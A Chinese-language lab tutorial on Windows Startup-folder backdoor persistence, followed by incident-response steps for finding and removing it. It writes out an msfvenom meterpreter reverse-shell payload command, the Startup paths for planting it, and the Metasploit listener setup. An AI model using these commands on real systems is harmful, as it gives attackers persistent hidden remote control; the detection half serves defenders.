Windows留后门--教程(四)——Windows启动项后门
一、Windows启动项后门介绍
Windows启动项后门也是攻击者常用的权限维持方式,大体上可以分为两种。一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。
二、Windows启动项后门-教程
前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限
靶机: windows Server2012
IP: 192.168.226.128
攻击机: kali
IP: 192.168.226.131
2.1 利用MSF生成一个EXE类型的后门木马
命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
2.2 将后门放在 Windows启动项
“「开始」菜单”是Windows计算机在启动时都会访问到的路径,那么将wxiaoge.exe后门文件放在启动项中,那么服务器每次重启都会运行该后门,从而达到权限维持的目的
放好wxiaoge.exe后门文件之后,重启服务器
注意:
“「开始」菜单”启动项指示了启动文件夹的位置,具体位置如下:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup
2.3 监听返回的shell
在kali上监听端口8888,重启windows server2012服务器之后马上就接收到目标机弹回来的shell,且目标机每次重启都会启动 wxiaoge.exe后门程序。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 8888
exploit
三、Windows启动项后门——应急响应发现
3.1 查看网络连接
如果windows server 2012 服务器与黑客网络联通时,使用命令 “netstat -ano” 是可以查看到异常连接
通过PID号查找该进程文件所在的位置
wmic process get name,executablepath,processid|findstr 2920
异常程序所在位置:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wxiaoge.exe wxiaoge.exe
之后可以删除该文件并且杀掉该进程
通过PID号强制杀掉进程的命令:
taskkill /f /pid 2920
3.2 查看启动文件
如果windows server 2012 服务器与黑客网络不联通时,使用命令 “netstat -ano” 是不可以查看异常连接
那么可以查看服务器上的所有启动文件
然后查看 登录
查看这两处发现,有一个进程是可疑的“粉红色”
接下来查看所有的“粉红色”的程序,并且将程序放在微步云沙箱去检测,经检测发现c:\users\administrator\desktop\wxiaoge.exe文件为后门木马
注意:
粉色: 表示该条目对应的应用没有数字签名、签名不匹配或者没有发行商信息(可疑程序一般都是粉色)
黄色: 表示该启动条目对应的文件已经不存在了(可疑程序也可能是黄色)
绿色: 表示与之前保存的启动项配置比较,对比出来的差异将以绿色高亮进行显示。
处置:
1、删除 c:\programdata\microsoft\windows\start menu\programs\startup\wxiaoge.exe 异常启动项文件
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
Windows留后门--教程(四)——Windows启动项后门相关推荐
- windows 增加开机启动服务器,Windows Server2012删除或添加开机启动项的方法
Windows Server2012怎么删除或添加开机启动项?Windows Server 2012跟Windows8一样,拥有全新的任务管理器.Windows Server 2012可以随意在服务器 ...
- win2012服务器 注册表,Windows Server2012删除或添加开机启动项的方法
Windows Server 2012跟Windows8一样,拥有全新的任务管理器.Windows Server 2012可以随意在服务器核心(只有命令提示符)和图形界面之间切换.但是,还有一部分人不 ...
- Ubuntu+Windows双系统,开机默认启动项设置Windows优先
电脑是Ubuntu18.04+Win10双系统,开机一直都是默认先Ubuntu,Windows在最下面,有时候按下开机键一不留神就进Ubuntu了,于是寻思着在启动项中设置为默认优先Windows. ...
- Windows操作系统用注册表删除启动项
或许很多人会烦恼:为何系统有那么多启动项? 有人也会想, 在任务管理器下, 这些启动项只能禁用? 不能删除吗? 下面就说明用注册表删除启动项的办法. 工具/原料 64位的Windows操作系统_笔者使 ...
- Qt:Windows编程—Qt实现注册表启动项管理
Qt实现注册表启动项管理 前言 Windows的开机启动项在很多地方都有设置,这次我们在注册表 子键"HKEY_LOCAL_MACHINE\Software\Microsoft\Window ...
- LINUX留后门--教程(六)—— PAM后门
一.本教程作用 1.用在攻击的途径上 2.应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二.PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种ge ...
- LINUX留后门--教程(七)—— alias 后门
一. alias 简介 alias 命令的功能: 为命令设置别名. 比如: 每次输入 ls 命令的时候都能实现 ls -al alias ls = 'ls -al' 注意: 对于通过ssh远程登录的用 ...
- 微软官方windows系统下载教程(Windows 10、8.1、7)
百度关键词"下载Windows光盘映像(ISO 文件)",找到[下载Windows X光盘映像(ISO 文件)]的标题,点开查看链接,如果microsoft.com域名的链接,则说 ...
- 【系统自启动】使用windows自带工具管理开机启动项
1.windows+R,键入:msconfig 2.进入启动选项卡 3.将不用自启动的选项 取消勾选即可 点击应用,重启电脑即可
- linux系统启动项没了,重装Windows后找回丢失的Linux启动项
众所周知,安装Windows和linux双系统的时候最好是先装Windows,然后安装linux.因为linux可以寻找硬盘下的Windows系统,从而显示引导菜单.而霸道的Windows直接无视其他 ...
最新文章
- 《Python编程从入门到实践》记录之将Python函数存储在模块中(import、import*)
- 基于java的九宫格求解程序。以荷兰数学家设计的世界最难九宫格为例。
- 转:android TextView中超链接的事件捕捉(textview上LINK的点击事件)
- 干货 | 万字长文带你复习线性代数!
- python可以跨平台吗_python是跨平台的么
- 低代码平台对程序员产生的内卷,零代码、低代码系列之一「对于零代、低代码平台的思考」
- 2023计算机毕业设计SSM最新选题之java不忘初心主题教育管理系统kn89g
- C语言中自定义的标识符
- 小猿圈:web前端工程师工资有多高?
- XHR 和 Fetch 的使用详解和区别总结
- c语言运行可以微信直接打开吗,如何用软件visual+c+++直接打开已将创建好的MFC工程文? 爱问知识人...
- SAP access 破解
- 没有实习经验,没有项目经验,简历怎么写?
- 数字签名与数字信封流程
- ICEM CFD结构化网格画边界层的方法
- 从程序员到项目经理(2):认识项目经理
- LipstickTest口红试色项目
- pinia 介绍与安装
- 【DS with Python】DataFrame的合并、分组聚合与数据透视表
- 修改Google Chrome浏览器背景颜色的方法